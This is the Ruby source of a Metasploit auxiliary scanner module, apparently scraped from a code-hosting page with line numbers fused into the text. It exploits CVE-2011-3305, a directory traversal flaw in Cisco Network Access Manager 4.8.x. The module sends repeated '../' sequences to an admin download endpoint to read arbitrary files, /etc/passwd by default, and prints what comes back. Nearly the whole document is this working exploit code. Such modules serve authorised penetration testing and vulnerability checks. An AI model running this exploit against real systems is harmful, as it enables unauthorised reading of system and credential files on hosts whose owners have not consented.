Path: blob/master/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb
19721 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Scanner89def initialize10super(11'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability',12'Description' => %q{13This module tests whether a directory traversal vulnerability is present14in versions of Cisco Network Access Manager 4.8.x You may wish to change15FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.16},17'References' => [18[ 'CVE', '2011-3305' ],19[ 'OSVDB', '76080']20],21'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],22'License' => MSF_LICENSE,23'DefaultOptions' => {24'SSL' => true25}26)2728register_options(29[30Opt::RPORT(443),31OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),32OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),33]34)35end3637def run_host(ip)38traversal = '../../'39part1 = '/admin/file_download?tag='40part2 = '&fileType=snapshot'4142begin43print_status("Attempting to connect to #{rhost}:#{rport}")44res = send_request_raw(45{46'method' => 'GET',47'uri' => '/admin',48}, 2549)5051if (res)521.upto(datastore['MAXDIRS']) do |level|53try = traversal * level54traversalstring = part1 + try + datastore['FILE'] + part255res = send_request_raw(56{57'method' => 'GET',58'uri' => traversalstring,59}, 2560)61if (res and res.code == 200)62print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")63break64elsif (res and res.code)65print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")66end67end68end69rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout70rescue ::Timeout::Error, ::Errno::EPIPE71end72end73end747576